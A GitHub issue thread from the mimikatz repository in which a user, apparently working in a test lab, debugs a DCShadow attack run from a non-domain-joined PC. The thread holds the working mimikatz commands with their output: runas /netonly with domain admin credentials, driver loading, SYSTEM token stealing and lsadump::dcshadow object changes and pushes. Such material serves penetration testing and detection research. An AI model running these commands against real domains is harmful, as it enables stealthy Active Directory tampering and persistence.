mimikatz
mimikatz copied to clipboard
gentilkiwi
Can't find way to run Mimikatz in context of a domain administrator on non-domain-joined PC for DC Shadow attack
I'm looking for a way to launch mimikatz within the context of an AD domain administrator (DA) so that if I use the token::whoami command it shows me running in that context: mimikatz # token::whoami
- Process Token : {0;000003e7} 2 D 1443633 TARGETDOMAIN\ADMINUSER S-xxxxx (04g,30p) Primary
- Thread Token : no token
The attack PC does have line of sight to a Domain Controller, but I can't figure out how I can start mimikatz in that DA context. Is there a way to do this?
Thanks.
Uhh you try runas already?
On Thu, Mar 16, 2023 at 15:06 rick-engle @.***> wrote:
I'm looking for a way to launch mimikatz within the context of an AD domain administrator (DA) so that if I use the token::whoami command it shows me running in that context: mimikatz # token::whoami
- Process Token : {0;000003e7} 2 D 1443633 TARGETDOMAIN\ADMINUSER S-1-5-18 (04g,30p) Primary
- Thread Token : no token
The attack PC does have line of sight to a Domain Controller, but I can't figure out how I can start mimikatz in that DA context. Is there a way to do this?
Thanks.
— Reply to this email directly, view it on GitHub https://github.com/gentilkiwi/mimikatz/issues/423, or unsubscribe https://github.com/notifications/unsubscribe-auth/AEOE6BTG7DH4SP7ZHHWSL2TW4NXGHANCNFSM6AAAAAAV5VXKAU . You are receiving this because you are subscribed to this thread.Message ID: @.***>
I did try that but unfortunately I get this error: C:\temp>runas /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe" Enter the password for mydomain.com\badadmin: Attempting to start C:\Attackfolder\x64\mimikatz.exe as user "mydomain.com\badadmin" ... RUNAS ERROR: Unable to run - C:\Attackfolder\x64\mimikatz.exe 1787: The security database on the server does not have a computer account for this workstation trust relationship.
Hi @gentilkiwi , That command works but doesn't seem to change the user context. If I use this it launches mimikatz OK, but the whoami still shows me in the context of the local admin account I signed into the Windows PC with: runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe" mimikatz # token::whoami
- Process Token : {0;0057a282} 2 L 5743378 ATTACKER-EXT\georgej S-1-5-21-3967830162-2019074872-1635380170-1000 (12g,05p) Primary
- Thread Token : no token
The netonly, is ... network only.
If all is ok, you'll see correct user in a network cap. by eg.
Ok that is good to know. I put everything together for my DC Shadow attack (which I can get working fine on a domain-joined PC) but the first mimikatz session making an attribute change never receives the sync from session #2 making the push. I did turn off the Windows firewalls on this Windows 10 PC as I did on other domain-joined machines where this worked. I guessed at the parameters I needed for the lsadump::dcshadow /object and lsadump::dcshadow /push commands to enable them to find the domain controller. This attack PC DOES have line of sight to the domain controller:
Mimikatz session #1
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
/ \ ## /*** Benjamin DELPY gentilkiwi ( [email protected] )
\ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # !+ [+] 'mimidrv' service already registered [*] 'mimidrv' service already started
mimikatz # !processtoken Token from process 0 to process 0
- from 0 will take SYSTEM token
- to 0 will take all 'cmd' and 'mimikatz' process Token from 4/System
- to 4976/cmd.exe
- to 5704/mimikatz.exe
- to 2844/mimikatz.exe
mimikatz # lsadump::dcshadow /object:jeffl /dc:DC1.mydomain.com /attribute:Description /value="My new cool description is swell!" ** Domain Info **
Domain: DC=mydomain,DC=com Configuration: CN=Configuration,DC=mydomain,DC=com Schema: CN=Schema,CN=Configuration,DC=mydomain,DC=com dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com domainControllerFunctionality: 6 ( WIN2012R2 ) highestCommittedUSN: 635132
** Server Info **
Server: DC1.mydomain.com InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c} InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a} Fake Server (not already registered): ATTACKER-EXT.mydomain.com
** Attributes checking **
#0: Description
** Objects **
#0: jeffl DN:CN=JeffL,CN=Users,DC=mydomain,DC=com Description (2.5.4.13-d rev 1): My new cool description is swell! (4d00790020006e0065007700200063006f006f006c0020006400650073006300720069007000740069006f006e0020006900730020007300770065006c006c0021000000)
** Starting server **
BindString[0]: ncacn_ip_tcp:ATTACKER-EXT[53196] RPC bind registered RPC Server is waiting! == Press Control+C to stop ==
Mimikatz session #2 Launch with: runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"
mimikatz # token::whoami
- Process Token : {0;00630804} 2 L 6490326 ATTACKER-EXT\georgej S-1-5-21-3967830162-2019074872-1635380170-1000 (12g,05p) Primary
- Thread Token : no token
mimikatz # lsadump::dcshadow /push ERROR kull_m_net_getDC ; DsGetDcName: 1355
mimikatz # lsadump::dcshadow /push /dc:DC1.mydomain.com ** Domain Info **
Domain: DC=mydomain,DC=com Configuration: CN=Configuration,DC=mydomain,DC=com Schema: CN=Schema,CN=Configuration,DC=mydomain,DC=com dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=mydomain,DC=com domainControllerFunctionality: 6 ( WIN2012R2 ) highestCommittedUSN: 635133
** Server Info **
Server: DC1.mydomain.com InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c} InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a} Fake Server (not already registered): ATTACKER-EXT.mydomain.com
** Performing Registration **
** Performing Push **
Syncing DC=mydomain,DC=com Sync Done
** Performing Unregistration **
Are you in a virtualized environment or attached to multiple networks? Also, have you dumped dns traffic to see what’s going on?
On Fri, Mar 17, 2023 at 09:47 rick-engle @.***> wrote:
Ok that is good to know. I put everything together for my DC Shadow attack (which I can get working fine on a domain-joined PC) but the first mimikatz session making an attribute change never receives the sync from session #2 https://github.com/gentilkiwi/mimikatz/issues/2 making the push. I did turn off the Windows firewalls on this Windows 10 PC as I did on other domain-joined machines where this worked. I guessed at the parameters I needed for the lsadump::dcshadow /object and lsadump::dcshadow /push commands to enable them to find the domain controller. This attack PC DOES have line of sight to the domain controller:
Mimikatz session #1 https://github.com/gentilkiwi/mimikatz/issues/1
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) / \ ## /*** Benjamin DELPY gentilkiwi ( @.*** ) \ / ##
https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( @.*** ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # !+ [+] 'mimidrv' service already registered [*] 'mimidrv' service already started
mimikatz # !processtoken Token from process 0 to process 0
- from 0 will take SYSTEM token
- to 0 will take all 'cmd' and 'mimikatz' process Token from 4/System
- to 4976/cmd.exe
- to 5704/mimikatz.exe
- to 2844/mimikatz.exe
mimikatz # lsadump::dcshadow /object:jeffl /dc:DC1.mydomain.com /attribute:Description /value="My new cool description is swell!" ** Domain Info **
Domain: DC=toondom,DC=com Configuration: CN=Configuration,DC=toondom,DC=com Schema: CN=Schema,CN=Configuration,DC=toondom,DC=com dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=toondom,DC=com domainControllerFunctionality: 6 ( WIN2012R2 ) highestCommittedUSN: 635132
** Server Info **
Server: DC1.mydomain.com InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c} InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a} Fake Server (not already registered): ATTACKER-EXT.mydomain.com
** Attributes checking **
#0: Description
** Objects **
#0: jeffl DN:CN=JeffL,CN=Users,DC=toondom,DC=com Description (2.5.4.13-d rev 1): My new cool description is swell!
(4d00790020006e0065007700200063006f006f006c0020006400650073006300720069007000740069006f006e0020006900730020007300770065006c006c0021000000)
** Starting server **
BindString[0]: ncacn_ip_tcp:ATTACKER-EXT[53196] RPC bind registered RPC Server is waiting! == Press Control+C to stop ==
Mimikatz session #2 https://github.com/gentilkiwi/mimikatz/issues/2 Launch with: runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"
mimikatz # token::whoami
- Process Token : {0;00630804} 2 L 6490326 ATTACKER-EXT\georgej S-1-5-21-3967830162-2019074872-1635380170-1000 (12g,05p) Primary
- Thread Token : no token
mimikatz # lsadump::dcshadow /push ERROR kull_m_net_getDC ; DsGetDcName: 1355
mimikatz # lsadump::dcshadow /push /dc:DC1.mydomain.com ** Domain Info **
Domain: DC=toondom,DC=com Configuration: CN=Configuration,DC=toondom,DC=com Schema: CN=Schema,CN=Configuration,DC=toondom,DC=com dsServiceName: ,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=toondom,DC=com domainControllerFunctionality: 6 ( WIN2012R2 ) highestCommittedUSN: 635133
** Server Info **
Server: DC1.mydomain.com InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c} InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a} Fake Server (not already registered): ATTACKER-EXT.mydomain.com
** Performing Registration **
** Performing Push **
Syncing DC=toondom,DC=com Sync Done
** Performing Unregistration **
— Reply to this email directly, view it on GitHub https://github.com/gentilkiwi/mimikatz/issues/423#issuecomment-1473956085, or unsubscribe https://github.com/notifications/unsubscribe-auth/AEOE6BSZ6YYDSEXMKQTUVU3W4R2OPANCNFSM6AAAAAAV5VXKAU . You are receiving this because you commented.Message ID: @.***>
This seems like you are having network issues reading thru this, because I can't imagine this not being related to some type of network issue.
